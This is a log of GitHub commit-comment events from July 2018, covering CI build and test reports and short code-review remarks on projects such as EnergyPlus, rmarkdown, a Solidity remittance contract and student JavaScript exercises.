{"id":"7915026760","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29587165,"position":null,"line":null,"path":null,"commit_id":"13d69af0a4d201ab12d2558d9732b5c7f5e78c35","created_at":"2018-07-03T21:14:45Z","updated_at":"2018-07-03T21:14:45Z","author_association":"NONE","body":"158691015_Issue#6792 (Nigusse) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1684 of 1684 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-13d69af0a4d201ab12d2558d9732b5c7f5e78c35-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-13d69af0a4d201ab12d2558d9732b5c7f5e78c35-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-13d69af0a4d201ab12d2558d9732b5c7f5e78c35-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-40.21%25-green.png)</a>\n"}},"created_at":"2018-07-03T21:14:45Z"}
{"id":"7915032000","type":"CommitCommentEvent","actor":{"login":"rich-iannone"},"repo":{"name":"rstudio/rmarkdown"},"payload":{"comment":{"id":29587177,"position":null,"line":null,"path":null,"commit_id":"df2161aaebcfc9820f093ae99daa5ed09f2af875","created_at":"2018-07-03T21:16:04Z","updated_at":"2018-07-03T21:16:04Z","author_association":"MEMBER","body":"Do you see it with the same .Rmd file? Maybe that doesn't matter. If it does matter I'm using RStudio Version 1.2.749."}},"created_at":"2018-07-03T21:16:04Z"}
{"id":"7915032247","type":"CommitCommentEvent","actor":{"login":"balazskaxd"},"repo":{"name":"green-fox-academy/exitlol"},"payload":{"comment":{"id":29587178,"position":27,"line":65,"path":"week-07/reddit-proj/server.js","commit_id":"d365eb2dba7bd3bb844683ba189d12314bf5c25f","created_at":"2018-07-03T21:16:08Z","updated_at":"2018-07-03T21:16:08Z","author_association":"NONE","body":"You can use one variable for the query string, and replace it's content instead of creating new variables."}},"created_at":"2018-07-03T21:16:08Z"}
{"id":"7915039235","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"zold-io/java-api"},"payload":{"comment":{"id":29587198,"position":null,"line":null,"path":null,"commit_id":"93fa5fc251ff69dcb28db1b9a5195c111b05c004","created_at":"2018-07-03T21:17:52Z","updated_at":"2018-07-03T21:17:52Z","author_association":"NONE","body":"Puzzle `4-968ad704` discovered in   [`src/main/java/io/zold/api/WalletsIn.java`](  https://github.com/zold-io/java-api/blob/master/src/main/java/io/zold/api/WalletsIn.java)   and submitted as #12. Please, remember that the puzzle was not   necessarily added in this particular commit. Maybe it was added earlier, but   we discovered it only now."}},"created_at":"2018-07-03T21:17:52Z"}
{"id":"7915039360","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29587199,"position":null,"line":null,"path":null,"commit_id":"bb3b83b92c467eb723d6024c551ff65c343048d9","created_at":"2018-07-03T21:17:53Z","updated_at":"2018-07-03T21:17:53Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#ci-685](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#ci-685).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-685-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-03T21:17:53Z"}
{"id":"7915039416","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"zold-io/java-api"},"payload":{"comment":{"id":29587200,"position":null,"line":null,"path":null,"commit_id":"93fa5fc251ff69dcb28db1b9a5195c111b05c004","created_at":"2018-07-03T21:17:54Z","updated_at":"2018-07-03T21:17:54Z","author_association":"NONE","body":"Puzzle `4-aab61a84` discovered in   [`src/main/java/io/zold/api/WalletsIn.java`](  https://github.com/zold-io/java-api/blob/master/src/main/java/io/zold/api/WalletsIn.java)   and submitted as #13. Please, remember that the puzzle was not   necessarily added in this particular commit. Maybe it was added earlier, but   we discovered it only now."}},"created_at":"2018-07-03T21:17:54Z"}
{"id":"7915039732","type":"CommitCommentEvent","actor":{"login":"3DRoberto"},"repo":{"name":"stormcolor/grel"},"payload":{"comment":{"id":29587202,"position":null,"line":null,"path":null,"commit_id":"63a1633f1519dfd95161b8ddae21e110a6854e20","created_at":"2018-07-03T21:17:59Z","updated_at":"2018-07-03T21:17:59Z","author_association":"CONTRIBUTOR","body":"important correction"}},"created_at":"2018-07-03T21:17:59Z"}
{"id":"7915043768","type":"CommitCommentEvent","actor":{"login":"rich-iannone"},"repo":{"name":"rstudio/rmarkdown"},"payload":{"comment":{"id":29587210,"position":null,"line":null,"path":null,"commit_id":"df2161aaebcfc9820f093ae99daa5ed09f2af875","created_at":"2018-07-03T21:18:57Z","updated_at":"2018-07-03T21:18:57Z","author_association":"MEMBER","body":"Also, for browsers, I'm using Safari v11.1.1, Chrome v67.0.3396.99, and Firefox v59.0.2. All three don't result in scrolling of the code chunk. "}},"created_at":"2018-07-03T21:18:57Z"}
{"id":"7915048088","type":"CommitCommentEvent","actor":{"login":"Kizoky"},"repo":{"name":"Kizoky/Mr_SmileyII"},"payload":{"comment":{"id":29587225,"position":null,"line":null,"path":null,"commit_id":"892da14dc797444ceba62a9f17756fb1f4be3448","created_at":"2018-07-03T21:19:59Z","updated_at":"2018-07-03T21:19:59Z","author_association":"OWNER","body":"Forgot to mention\r\nThis commit removed the ability to play on id levels: E2M2 and E3M4\r\nYou can still access it via console, but in normal means it's impossible"}},"created_at":"2018-07-03T21:19:59Z"}
{"id":"7915048545","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/saymore"},"payload":{"comment":{"id":29587227,"position":null,"line":null,"path":null,"commit_id":"7c77455ff60f28ae7fe7e1a2f17965d7c5087669","created_at":"2018-07-03T21:20:05Z","updated_at":"2018-07-03T21:20:05Z","author_association":"NONE","body":"TeamCity SayMore :: SayMore pull requests [Build *.*.198.7c77455ff60f28ae7fe7e1a2f17965d7c5087669](http://build.palaso.org/viewLog.html?buildId=124152&buildTypeId=SayMore_SayMorePullRequests) outcome was **FAILURE**\nSummary: Failed to resolve artifact dependency Build time: 00:00:13"}},"created_at":"2018-07-03T21:20:05Z"}
{"id":"7915049155","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29587230,"position":null,"line":null,"path":null,"commit_id":"13d69af0a4d201ab12d2558d9732b5c7f5e78c35","created_at":"2018-07-03T21:20:13Z","updated_at":"2018-07-03T21:20:13Z","author_association":"NONE","body":"158691015_Issue#6792 (Nigusse) - Win64-Windows-7-VisualStudio-14: OK (2931 of 2932 tests passed, 11 test warnings)\n\nMessages:\n\n * 12 tests had: AUD diffs.\n * 1 test had: BND diffs.\n * 1 test had: EIO diffs.\n * 1 test had: ERR diffs.\n * 1 test had: ESO big diffs.\n * 1 test had: MDD diffs.\n * 1 test had: MTD diffs.\n * 1 test had: MTR big diffs.\n * 1 test had: RDD diffs.\n * 1 test had: Table big diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 622\n * Failed: 1\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-13d69af0a4d201ab12d2558d9732b5c7f5e78c35-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-13d69af0a4d201ab12d2558d9732b5c7f5e78c35-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.97%25-yellow.png)</a> \n"}},"created_at":"2018-07-03T21:20:13Z"}
{"id":"7915049575","type":"CommitCommentEvent","actor":{"login":"yihui"},"repo":{"name":"rstudio/rmarkdown"},"payload":{"comment":{"id":29587231,"position":null,"line":null,"path":null,"commit_id":"df2161aaebcfc9820f093ae99daa5ed09f2af875","created_at":"2018-07-03T21:20:19Z","updated_at":"2018-07-03T21:20:19Z","author_association":"MEMBER","body":"That is really weird. Let's test with the same reprex first: https://github.com/rstudio/rmarkdown/issues/654#issuecomment-380234085"}},"created_at":"2018-07-03T21:20:19Z"}
{"id":"7915053700","type":"CommitCommentEvent","actor":{"login":"kmclaren-trinity"},"repo":{"name":"kmclaren-trinity/testingMerge"},"payload":{"comment":{"id":29587246,"position":null,"line":null,"path":null,"commit_id":"7881087a78e0fb398798200ad786f4556a1832af","created_at":"2018-07-03T21:21:19Z","updated_at":"2018-07-03T21:21:19Z","author_association":"OWNER","body":"This was successful. changes from master were merged ito b1, but master was left the same"}},"created_at":"2018-07-03T21:21:19Z"}
{"id":"7915054777","type":"CommitCommentEvent","actor":{"login":"TheIronBorn"},"repo":{"name":"TheIronBorn/simd_prngs"},"payload":{"comment":{"id":29587249,"position":null,"line":null,"path":null,"commit_id":"2f3402681d5742ff0d2c4bb77727dd0768f133bd","created_at":"2018-07-03T21:21:35Z","updated_at":"2018-07-03T21:21:35Z","author_association":"OWNER","body":"done https://github.com/TheIronBorn/simd_prngs/commit/90c22b1ce47b29d6adbb0c597c4dc33a64db8741"}},"created_at":"2018-07-03T21:21:35Z"}
{"id":"7915055964","type":"CommitCommentEvent","actor":{"login":"pkboom"},"repo":{"name":"pkboom/vue-tips"},"payload":{"comment":{"id":29587253,"position":null,"line":null,"path":null,"commit_id":"a85f0260ad4cab5335de71c066a91dd8924369de","created_at":"2018-07-03T21:21:52Z","updated_at":"2018-07-03T21:21:52Z","author_association":"OWNER","body":"![fireshot capture 071 - laravel - http___localhost_3000_](https://user-images.githubusercontent.com/13960169/42245106-8c6126ac-7ee5-11e8-86d7-9755e66d6882.png)\r\n"}},"created_at":"2018-07-03T21:21:52Z"}
{"id":"7915084634","type":"CommitCommentEvent","actor":{"login":"n1bor"},"repo":{"name":"ACINQ/eclair"},"payload":{"comment":{"id":29587321,"position":23,"line":820,"path":"eclair-core/src/main/scala/fr/acinq/eclair/channel/Channel.scala","commit_id":"b7b9f4929aedf38347bf522b248c7c79af520a38","created_at":"2018-07-03T21:28:58Z","updated_at":"2018-07-03T21:28:58Z","author_association":"CONTRIBUTOR","body":"@pm47 Are you sure this works? Just the channelUpdate will be identical to the previous one as all the inputs are identical. So will match this case:\r\n> case (d1: DATA_NORMAL, d2: DATA_NORMAL) if d1.channelUpdate == d2.channelUpdate && d1.channelAnnouncement == d2.channelAnnouncement =>\r\n          // don't do anything if neither the channel_update nor the channel_announcement didn't change\r\n          ()\r\nand so do nothing and not publish announcement.\r\n\r\nThis is a big issue if node is stable as you will slowly disappear from network."}},"created_at":"2018-07-03T21:28:58Z"}
{"id":"7915096322","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"ivowillemsen/b9lab-remittance"},"payload":{"comment":{"id":29587346,"position":11,"line":24,"path":"contracts/Remittance.sol","commit_id":"207c48ae10d1664841e3b61101b01182ac77507a","created_at":"2018-07-03T21:31:52Z","updated_at":"2018-07-03T21:31:52Z","author_association":"NONE","body":"More like `(recipient, pass...`?"}},"created_at":"2018-07-03T21:31:52Z"}
{"id":"7915098639","type":"CommitCommentEvent","actor":{"login":"balazskaxd"},"repo":{"name":"green-fox-academy/tundecsapo"},"payload":{"comment":{"id":29587354,"position":11,"line":11,"path":"week-07/day-03/BookstoreEndpoints/server.js","commit_id":"0444a66df771722759ce3fb9e07ca160656e0088","created_at":"2018-07-03T21:32:26Z","updated_at":"2018-07-03T21:32:26Z","author_association":"NONE","body":"Put your static files under the same folder"}},"created_at":"2018-07-03T21:32:26Z"}
{"id":"7915099232","type":"CommitCommentEvent","actor":{"login":"balazskaxd"},"repo":{"name":"green-fox-academy/tundecsapo"},"payload":{"comment":{"id":29587356,"position":17,"line":17,"path":"week-07/day-03/BookstoreEndpoints/server.js","commit_id":"0444a66df771722759ce3fb9e07ca160656e0088","created_at":"2018-07-03T21:32:35Z","updated_at":"2018-07-03T21:32:35Z","author_association":"NONE","body":"👍 "}},"created_at":"2018-07-03T21:32:35Z"}
{"id":"7915099641","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"ivowillemsen/b9lab-remittance"},"payload":{"comment":{"id":29587366,"position":58,"line":54,"path":"contracts/Remittance.sol","commit_id":"207c48ae10d1664841e3b61101b01182ac77507a","created_at":"2018-07-03T21:32:41Z","updated_at":"2018-07-03T21:32:41Z","author_association":"NONE","body":"`now + dayClaim * 1 days` I think."}},"created_at":"2018-07-03T21:32:41Z"}
{"id":"7915101495","type":"CommitCommentEvent","actor":{"login":"seesiva"},"repo":{"name":"seesiva/thirukkovaiyar"},"payload":{"comment":{"id":29587371,"position":null,"line":null,"path":null,"commit_id":"bc263aec4b45966848d3271d22b5b7fa1c10022e","created_at":"2018-07-03T21:33:10Z","updated_at":"2018-07-03T21:33:10Z","author_association":"OWNER","body":"Thanks @balamurugan-code  👍 "}},"created_at":"2018-07-03T21:33:10Z"}
{"id":"7915101897","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"ivowillemsen/b9lab-remittance"},"payload":{"comment":{"id":29587375,"position":130,"line":114,"path":"contracts/Remittance.sol","commit_id":"207c48ae10d1664841e3b61101b01182ac77507a","created_at":"2018-07-03T21:33:16Z","updated_at":"2018-07-03T21:33:16Z","author_association":"NONE","body":"Can you find a way avoid hash collisions between 2 different Remittance contracts?"}},"created_at":"2018-07-03T21:33:16Z"}
{"id":"7915103764","type":"CommitCommentEvent","actor":{"login":"balazskaxd"},"repo":{"name":"green-fox-academy/tundecsapo"},"payload":{"comment":{"id":29587378,"position":3,"line":3,"path":"week-07/day-03/BookstoreEndpoints/static/style.css","commit_id":"0444a66df771722759ce3fb9e07ca160656e0088","created_at":"2018-07-03T21:33:44Z","updated_at":"2018-07-03T21:33:44Z","author_association":"NONE","body":";"}},"created_at":"2018-07-03T21:33:44Z"}
{"id":"7915105509","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"ivowillemsen/b9lab-remittance"},"payload":{"comment":{"id":29587385,"position":28,"line":28,"path":"contracts/Remittance.sol","commit_id":"d752b77e2835c5c9fe44bb825e5c875d5f754c73","created_at":"2018-07-03T21:34:12Z","updated_at":"2018-07-03T21:34:12Z","author_association":"NONE","body":"Also, this should probably go into `Owned`."}},"created_at":"2018-07-03T21:34:12Z"}
{"id":"7915106419","type":"CommitCommentEvent","actor":{"login":"mungojam"},"repo":{"name":"hvanbakel/CsprojToVs2017"},"payload":{"comment":{"id":29587387,"position":26,"line":26,"path":"Project2015To2017.Console/Options.cs","commit_id":"93427f971f5b80616e8784535340fd2fe1078c90","created_at":"2018-07-03T21:34:27Z","updated_at":"2018-07-03T21:34:27Z","author_association":"CONTRIBUTOR","body":"I think this should be implemented as an optional transform, like all the other project transforms. For one thing, it's a useful one which I'd like to use via the nuget package"}},"created_at":"2018-07-03T21:34:27Z"}
{"id":"7915110401","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"ivowillemsen/b9lab-remittance"},"payload":{"comment":{"id":29587401,"position":45,"line":45,"path":"contracts/Remittance.sol","commit_id":"207c48ae10d1664841e3b61101b01182ac77507a","created_at":"2018-07-03T21:35:27Z","updated_at":"2018-07-03T21:35:27Z","author_association":"NONE","body":"In general, I think contracts should not deal with conversions. Contracts count in seconds, then you should pass seconds."}},"created_at":"2018-07-03T21:35:27Z"}
{"id":"7915111853","type":"CommitCommentEvent","actor":{"login":"balazskaxd"},"repo":{"name":"green-fox-academy/tundecsapo"},"payload":{"comment":{"id":29587408,"position":31,"line":17,"path":"week-07/day-03/BookstoreEndpoints/assets/bookstore.js","commit_id":"a9bf4e29cb7d20d96396641fcbe5858d29a1b5a4","created_at":"2018-07-03T21:35:50Z","updated_at":"2018-07-03T21:35:50Z","author_association":"NONE","body":"Pay attention to indentation."}},"created_at":"2018-07-03T21:35:50Z"}
{"id":"7915112722","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29587409,"position":null,"line":null,"path":null,"commit_id":"1ceb3cbff766cc8b17d9f1136534c189189d26a3","created_at":"2018-07-03T21:36:04Z","updated_at":"2018-07-03T21:36:04Z","author_association":"OWNER","body":"Created multidev environment [dgreat#pr-174](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#pr-174).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-174-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-03T21:36:04Z"}
{"id":"7915113096","type":"CommitCommentEvent","actor":{"login":"balazskaxd"},"repo":{"name":"green-fox-academy/tundecsapo"},"payload":{"comment":{"id":29587411,"position":52,"line":37,"path":"week-07/day-03/BookstoreEndpoints/assets/bookstore.js","commit_id":"a9bf4e29cb7d20d96396641fcbe5858d29a1b5a4","created_at":"2018-07-03T21:36:10Z","updated_at":"2018-07-03T21:36:10Z","author_association":"NONE","body":"Use built-in array methods"}},"created_at":"2018-07-03T21:36:10Z"}
{"id":"7915114046","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"ivowillemsen/b9lab-remittance"},"payload":{"comment":{"id":29587414,"position":128,"line":112,"path":"contracts/Remittance.sol","commit_id":"207c48ae10d1664841e3b61101b01182ac77507a","created_at":"2018-07-03T21:36:24Z","updated_at":"2018-07-03T21:36:24Z","author_association":"NONE","body":"You can make it `bytes32 passwordBob`, it would still be safe."}},"created_at":"2018-07-03T21:36:24Z"}
{"id":"7915115135","type":"CommitCommentEvent","actor":{"login":"balazskaxd"},"repo":{"name":"green-fox-academy/tundecsapo"},"payload":{"comment":{"id":29587417,"position":93,"line":124,"path":"week-07/day-03/BookstoreEndpoints/assets/bookstore.js","commit_id":"8ba824c28bfcb3950e0e2176a15400efd1ef64e4","created_at":"2018-07-03T21:36:40Z","updated_at":"2018-07-03T21:36:40Z","author_association":"NONE","body":"👌 "}},"created_at":"2018-07-03T21:36:40Z"}
{"id":"7915115198","type":"CommitCommentEvent","actor":{"login":"bovine3dom"},"repo":{"name":"cmcaine/tridactyl"},"payload":{"comment":{"id":29587418,"position":6,"line":2095,"path":"src/excmds.ts","commit_id":"e20a224fb8d8bbb2b742599cc69672d7c9fe0c42","created_at":"2018-07-03T21:36:41Z","updated_at":"2018-07-03T21:36:41Z","author_association":"COLLABORATOR","body":"Thanks. I was just seeing how much nonsense code I could commit within the space of 24 hours, is my excuse."}},"created_at":"2018-07-03T21:36:41Z"}
{"id":"7915119240","type":"CommitCommentEvent","actor":{"login":"tomturner"},"repo":{"name":"sguermond/django-tenants"},"payload":{"comment":{"id":29587423,"position":null,"line":null,"path":null,"commit_id":"1eb94758e4ae20121316e1f5ed31e1b71f35e6b5","created_at":"2018-07-03T21:37:47Z","updated_at":"2018-07-03T21:37:47Z","author_association":"NONE","body":"I like this idea of cloning a tenant did you want to do a pull request."}},"created_at":"2018-07-03T21:37:47Z"}
{"id":"7915121130","type":"CommitCommentEvent","actor":{"login":"danielnaber"},"repo":{"name":"languagetool-org/languagetool"},"payload":{"comment":{"id":29587428,"position":null,"line":null,"path":null,"commit_id":"1685373dedc9d430b35e834ebdf7877e5fcd21d8","created_at":"2018-07-03T21:38:14Z","updated_at":"2018-07-03T21:38:14Z","author_association":"MEMBER","body":"But the explanation (i.e. the `<message>`) is always the same, isn't it?"}},"created_at":"2018-07-03T21:38:14Z"}
{"id":"7915122451","type":"CommitCommentEvent","actor":{"login":"dendrugo"},"repo":{"name":"dendrugo/ListofClientsReact"},"payload":{"comment":{"id":29587432,"position":null,"line":null,"path":null,"commit_id":"871ff9024913303d9e01244bed278e6e4b15bf3c","created_at":"2018-07-03T21:38:36Z","updated_at":"2018-07-03T21:38:36Z","author_association":"OWNER","body":"Начало проекта)"}},"created_at":"2018-07-03T21:38:36Z"}
{"id":"7915124381","type":"CommitCommentEvent","actor":{"login":"capitains-hook"},"repo":{"name":"OpenGreekAndLatin/First1KGreek"},"payload":{"comment":{"id":29587435,"position":null,"line":null,"path":null,"commit_id":"aea5f1227a0c13f6ed7878f5115a7600d9ddc189","created_at":"2018-07-03T21:39:06Z","updated_at":"2018-07-03T21:39:06Z","author_association":"NONE","body":"## Global\n\n| Changed       |   Status |\n|:--------------|---------:|\n| `nodes_count` |       +8 |\n\n## Words\n\n| Changed   |   Status |\n|:----------|---------:|\n| `grc`     |     -828 |\n\n*[Hook UI build recap](http://ci.perseids.org/repo/OpenGreekAndLatin/First1KGreek/4414)*\n"}},"created_at":"2018-07-03T21:39:06Z"}
{"id":"7915124763","type":"CommitCommentEvent","actor":{"login":"JeanPaulLucien"},"repo":{"name":"JeanPaulLucien/saliengame_idler"},"payload":{"comment":{"id":29587436,"position":null,"line":null,"path":null,"commit_id":"f9d85dbb01dbe558e2f8fed09bf4744646698820","created_at":"2018-07-03T21:39:11Z","updated_at":"2018-07-03T21:39:11Z","author_association":"OWNER","body":"Read more about the last update: https://github.com/JeanPaulLucien/saliengame_idler/commit/c329ec5856d86d6cff1331202c53a4f1fc0c82ca"}},"created_at":"2018-07-03T21:39:11Z"}
{"id":"7915126216","type":"CommitCommentEvent","actor":{"login":"grshane"},"repo":{"name":"wvu-online/wvuonline"},"payload":{"comment":{"id":29587439,"position":null,"line":null,"path":null,"commit_id":"4754c69b2902b12b73aec428a386984b86437cc1","created_at":"2018-07-03T21:39:34Z","updated_at":"2018-07-03T21:39:34Z","author_association":"COLLABORATOR","body":"Created multidev environment [wvuonline#ci-224](https://dashboard.pantheon.io/sites/8fb52aa5-5525-4d73-9b84-f2d86faf1da2#ci-224).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-224-wvuonline.pantheonsite.io/)"}},"created_at":"2018-07-03T21:39:34Z"}
{"id":"7915126884","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"ivowillemsen/b9lab-remittance"},"payload":{"comment":{"id":29587441,"position":80,"line":69,"path":"contracts/Remittance.sol","commit_id":"207c48ae10d1664841e3b61101b01182ac77507a","created_at":"2018-07-03T21:39:44Z","updated_at":"2018-07-03T21:39:44Z","author_association":"NONE","body":"Making the withdraw also `payable` is bad because the Ether sent will not be accounted for."}},"created_at":"2018-07-03T21:39:44Z"}
{"id":"7915128048","type":"CommitCommentEvent","actor":{"login":"ilyasiba"},"repo":{"name":"AlViKov/Js"},"payload":{"comment":{"id":29587445,"position":19,"line":19,"path":"ninthLesson/js.js","commit_id":"b46ba32160c461218a757ad7ad56891741da526d","created_at":"2018-07-03T21:40:02Z","updated_at":"2018-07-03T21:40:02Z","author_association":"NONE","body":"const вместо var, и на следующей строке тоже"}},"created_at":"2018-07-03T21:40:02Z"}
{"id":"7915128974","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"ivowillemsen/b9lab-remittance"},"payload":{"comment":{"id":29587452,"position":102,"line":92,"path":"contracts/Remittance.sol","commit_id":"207c48ae10d1664841e3b61101b01182ac77507a","created_at":"2018-07-03T21:40:15Z","updated_at":"2018-07-03T21:40:15Z","author_association":"NONE","body":"You can declare this variable earlier and save gas."}},"created_at":"2018-07-03T21:40:15Z"}
{"id":"7915131068","type":"CommitCommentEvent","actor":{"login":"CAPCHIK"},"repo":{"name":"ITLabRTUMIREA/ITLab-Back"},"payload":{"comment":{"id":29587459,"position":null,"line":null,"path":null,"commit_id":"36d1f6097a01b0723a7ecaa6fe77fa751d408527","created_at":"2018-07-03T21:40:46Z","updated_at":"2018-07-03T21:40:46Z","author_association":"CONTRIBUTOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Даты при передаче интерпретируются неправильно. Где-то не учитывается часовой пояс](https://trello.com/c/e2VgXRsI/48-%D0%B4%D0%B0%D1%82%D1%8B-%D0%BF%D1%80%D0%B8-%D0%BF%D0%B5%D1%80%D0%B5%D0%B4%D0%B0%D1%87%D0%B5-%D0%B8%D0%BD%D1%82%D0%B5%D1%80%D0%BF%D1%80%D0%B5%D1%82%D0%B8%D1%80%D1%83%D1%8E%D1%82%D1%81%D1%8F-%D0%BD%D0%B5%D0%BF%D1%80%D0%B0%D0%B2%D0%B8%D0%BB%D1%8C%D0%BD%D0%BE-%D0%B3%D0%B4%D0%B5-%D1%82%D0%BE-%D0%BD%D0%B5-%D1%83%D1%87%D0%B8%D1%82%D1%8B%D0%B2%D0%B0%D0%B5%D1%82%D1%81%D1%8F-%D1%87%D0%B0%D1%81%D0%BE%D0%B2%D0%BE%D0%B9-%D0%BF%D0%BE%D1%8F%D1%81)"}},"created_at":"2018-07-03T21:40:46Z"}
{"id":"7915131252","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29587460,"position":null,"line":null,"path":null,"commit_id":"b8f6c31b971bf3ea3eadce7c465c85f69069d8a6","created_at":"2018-07-03T21:40:48Z","updated_at":"2018-07-03T21:40:48Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#pr-af-sitee](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#pr-af-sitee).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-af-sitee-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-03T21:40:48Z"}
{"id":"7915131437","type":"CommitCommentEvent","actor":{"login":"7jeronimo7"},"repo":{"name":"kotc-game/kotc"},"payload":{"comment":{"id":29587462,"position":null,"line":null,"path":null,"commit_id":"b8c52b227dcb4a703f0d847513e0c55fa630cebc","created_at":"2018-07-03T21:40:51Z","updated_at":"2018-07-03T21:40:51Z","author_association":"NONE","body":"Looks good!  Got my revised cards printed out and need to review all of the updates and try to figure out what every thing means.\r\n\r\nI had a couple more ideas for you but it would probably be too much effort.  In reviewing your profile, since you like to program, how about a program that allows people to build their own cards via a GUI interface.  That way only standard text is allowed on the cards and the quality of the cards is ensured by automatically calculating the costs based on the abilities and offense/defense chosen.  I know, it is probably too much work at this point to do.\r\n\r\nThe second idea was a mobile app for scanning a card to verify that a card complies with the rules.  I am not aware of any open source image to text conversion programs, so it would probably have to rely on free apps from Google or another third party.  The intent wouldn't be so much to catch cheaters, but simply people who miscalculated their costs for their cards or have them constructed under previous edition rules.\r\n\r\nLastly, I thought of the idea, which you probably have already, of the concept of rare and uncommon cards for kotc.  Uncommon cards could simply have a different rounding algorithm for say, creature defense, whereas a rare card could simply cost 1 less to deploy.  The problem with that I think is to keep things balanced limiting the number of rare and uncommon cards per deck.  I think that would prove too difficult to enforce/monitor and you are probably better off with the system that you currently have in place.\r\n\r\n"}},"created_at":"2018-07-03T21:40:51Z"}
{"id":"7915131559","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"ivowillemsen/b9lab-remittance"},"payload":{"comment":{"id":29587463,"position":79,"line":68,"path":"contracts/Remittance.sol","commit_id":"207c48ae10d1664841e3b61101b01182ac77507a","created_at":"2018-07-03T21:40:52Z","updated_at":"2018-07-03T21:40:52Z","author_association":"NONE","body":"You do not check the deadline on withdraw?"}},"created_at":"2018-07-03T21:40:52Z"}
{"id":"7915133511","type":"CommitCommentEvent","actor":{"login":"jkotas"},"repo":{"name":"dotnet/corefx"},"payload":{"comment":{"id":29587467,"position":17,"line":88,"path":"src/System.Security.Claims/src/System/Security/Claims/GenericPrincipal.cs","commit_id":"cb84728c6853dde522d2cc6a703a9a246622a9a1","created_at":"2018-07-03T21:41:20Z","updated_at":"2018-07-03T21:41:20Z","author_association":"MEMBER","body":"It would be nice to add comment to this that this is called by `AppDomain.GetThreadPrincipal()` via reflection."}},"created_at":"2018-07-03T21:41:20Z"}
{"id":"7915134219","type":"CommitCommentEvent","actor":{"login":"jkotas"},"repo":{"name":"dotnet/corefx"},"payload":{"comment":{"id":29587469,"position":5,"line":191,"path":"src/System.Security.Principal.Windows/src/System/Security/Principal/WindowsPrincipal.cs","commit_id":"cb84728c6853dde522d2cc6a703a9a246622a9a1","created_at":"2018-07-03T21:41:32Z","updated_at":"2018-07-03T21:41:32Z","author_association":"MEMBER","body":"Same here"}},"created_at":"2018-07-03T21:41:32Z"}
{"id":"7915136130","type":"CommitCommentEvent","actor":{"login":"balazskaxd"},"repo":{"name":"green-fox-academy/tundecsapo"},"payload":{"comment":{"id":29587472,"position":80,"line":80,"path":"week-07/day-04/reddit/assets/reddit.js","commit_id":"6aca3eab8b20b7c4f7d691b9dbdb0740d82c9fb3","created_at":"2018-07-03T21:42:03Z","updated_at":"2018-07-03T21:42:03Z","author_association":"NONE","body":"These http1-hhtp2-http3 names are not so sexy"}},"created_at":"2018-07-03T21:42:03Z"}
